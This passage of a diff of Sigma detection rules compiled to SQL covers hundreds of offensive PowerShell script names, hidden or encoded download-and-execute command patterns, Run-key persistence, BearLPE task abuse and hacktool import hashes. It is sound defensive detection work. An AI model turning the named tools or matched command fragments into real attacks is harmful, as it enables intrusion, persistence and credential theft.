ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml" 
+ "filename": "proc_creation_win_schtasks_folder_combos.yml" }, { - "title": "Malicious PowerShell Scripts - PoshModule", - "id": "41025fd7-0466-4650-a813-574aaacbe7f4", - "status": "experimental", - "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", - "author": "frack113, Nasreddine Bencherchali", + "title": "Potential BearLPE Exploitation", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "status": "test", + "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", + "author": "Olaf Hartong", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo 
LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE 
'%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" ], - "filename": "posh_pm_exploit_scripts.yml" + "filename": "proc_creation_win_exploit_other_bearlpe.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", - "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", + "title": "Suspicious Hacktool Execution - Imphash", + "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate use of one of these tools" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND 
ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', 
'1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', 
'09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE 
